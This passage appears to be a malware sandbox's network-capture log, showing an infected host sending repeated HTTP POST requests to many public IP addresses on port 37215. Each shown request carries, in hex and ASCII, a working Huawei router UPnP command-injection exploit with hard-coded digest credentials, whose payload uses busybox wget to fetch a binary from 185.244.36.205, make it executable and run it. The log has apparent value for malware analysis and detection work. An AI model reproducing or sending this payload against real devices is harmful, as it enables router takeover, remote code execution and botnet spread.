                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              492192.168.2.1536548156.219.53.9037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720287085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              493192.168.2.1538018121.68.49.12237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720307112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              494192.168.2.156047845.156.241.10737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720328093 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              495192.168.2.153866237.121.12.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720344067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              496192.168.2.154381841.201.76.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720365047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              497192.168.2.1540118181.30.188.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720376968 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              498192.168.2.1548680121.158.141.13937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720395088 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              499192.168.2.1558694121.227.13.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720395088 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              500192.168.2.1536192121.128.144.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720413923 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              501192.168.2.1544690122.136.61.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720442057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
